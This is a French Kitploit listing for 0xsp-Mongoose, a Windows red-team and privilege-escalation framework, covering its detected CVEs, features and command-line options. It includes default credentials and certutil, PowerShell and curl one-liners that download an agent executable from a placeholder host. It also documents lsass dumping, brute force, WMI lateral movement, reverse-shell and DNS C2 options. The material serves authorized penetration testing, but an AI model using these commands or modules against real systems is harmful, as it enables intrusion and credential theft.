Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
0xsp-Mongoose — un framework unique pour la simulation de cybersécurité et les opérations de red teaming, l'audit Windows pour les vulnérabilités récentes, les erreurs de configuration et les attaques d'escalade de privilèges, reproduire les tactiques et techniques d'un adversaire avancé dans un réseau. | Kitploit
Outils/GitHubGitHub/zux0x3a/0xsp-mongoose
Escalade de PrivilègesScanners de VulnérabilitésCartographie RéseauAttaques de Mots de PasseExploitationMouvement LatéralExploitation d'Applications WebPost-ExploitationCommandement et ContrôleRed TeamingAnalyse DNSArchived
534117il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

Voir le dépôtSite web

À propos

un framework unique pour la simulation de cybersécurité et les opérations de red teaming, l'audit Windows pour les vulnérabilités récentes, les erreurs de configuration et les attaques d'escalade de privilèges, reproduire les tactiques et techniques d'un adversaire avancé dans un réseau.

Partager

GPLv3 license

Soutenez le projet pour un développement continu (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED pour Windows

Version actuelle 2.2.0

La version rouge de 0xsp mongoose est fournie pour répondre à vos besoins lors de simulations de cybersécurité. En utilisant cette version, vous pourrez auditer un système d'exploitation Windows ciblé à la recherche de vulnérabilités système, de mauvaises configurations et d'attaques d'escalade de privilèges, et reproduire les tactiques et techniques d'un adversaire avancé dans un réseau.

Grâce au support de Node.js pour l'API d'application web, l'installation et la personnalisation deviennent beaucoup plus faciles en temps voulu. L'agent capteur Windows communiquera avec l'API de l'application pour transférer les résultats et recevoir des commandes selon une technique bidirectionnelle.

L'agent est capable d'identifier et de détecter les exploits Windows en utilisant les modules windows update api et exploit database definitions. La nouvelle version détectera également les vulnérabilités suivantes.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Fonctionnalités

  • Techniques de scan d'escalade de privilèges Windows.
  • Application web construite avec NodeJS
  • Support de la base de données sqlite
  • Techniques de mouvements latéraux. vidéo
  • Canal de communication bidirectionnel. vidéo
  • Empaquetage en ligne de plugins.
  • Moteur de script de détection d'exploits amélioré.
  • Module de brute force de comptes Windows (Local / Domaine)
  • Utilisation de la fonction d'API Windows run-as-user. Vidéo
  • Scan réseau local et énumération des partages.
  • Technique de dump mémoire lsass (plugin).
  • Mode shell interactif DNS C2C

installation

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

identifiants d'accès par défaut :

  • nom d'utilisateur : admin
  • mot de passe : 0xsp

Script python DNS C2C

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Déploiement rapide de l'agent

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Utilisation

root@kitploit:~
-s --récupérer les services Windows et les pilotes installés.
-u --récupérer des informations sur les utilisateurs, groupes, rôles.
-c --rechercher dans les pilotes connectés des fichiers de configuration sensibles par extension.
-n --récupérer les informations réseau, interfaces réseau, détails de connexion.
-w --énumérer les répertoires accessibles en écriture, vérifier les permissions d'accès, permissions modifiées.
-i --énumérer les informations système Windows, sessions, vérification Always Elevated.
-l --rechercher une chaîne spécifique dans n'importe quel fichier, ex : agent.exe -l c:\ password *.config.
-o --spécifier l'adresse hôte de l'application nodejs, vous pouvez aussi utiliser srvhost
-p --énumérer les logiciels installés, processus en cours, tâches.
-e --outil d'inspection du noyau, il vous aidera à rechercher dans les bases de données d'outils les vulnérabilités du noyau Windows
-x --mot de passe pour autoriser votre connexion avec l'application node js.
-d --télécharger des fichiers directement dans la machine cible.
-t --télécharger des fichiers depuis la machine cible vers l'application node js.
-spooler --analyser un seul hôte ou une liste d'hôtes pour une possible CVE-2021-1675 (par ex. -spooler -srvhost ou -spooler -hosts )
-m --exécuter tous les types de scan connus ensemble.

[!] SECTION TACTIQUES RED TEAM

-r --générer un shell inversé avec un compte spécifique.
-lr --technique de mouvement latéral utilisant WMI (par ex. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --découverte réseau et énumération des partages
-dns --établir un shell interactif DNS C2C
-cmd --transférer des commandes via HTTP Shell
-interactive --démarrer le mode interactif (par ex. : chargement de plugins, etc.)
-username --authentification d'identité pour des modules d'attaque spécifiques.
-password --authentification d'identité pour des modules d'attaque spécifiques.
-host --identifier l'hôte distant pour mener une attaque.
-srvhost --définir le rhost de l'application node js.
-bf --module de brute force pour utilisateurs locaux / domaine
-import --importer et exécuter un fichier dll localement
-remote --importer et exécuter un fichier dll depuis un hôte distant

Documentation

https://0xsp.com/security%20dev/0xsp-mongoose-red

Site de recherche détaillé

https://0xsp.com

Conférences de sécurité

  • Standoff365 - Russia (https://standoff365.com/conferences/357)

Tutoriels de l'outil

Assurez-vous de vous abonner à la chaîne suivante pour être informé des nouveaux tutoriels et astuces publiés pour 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Télécharger l’outil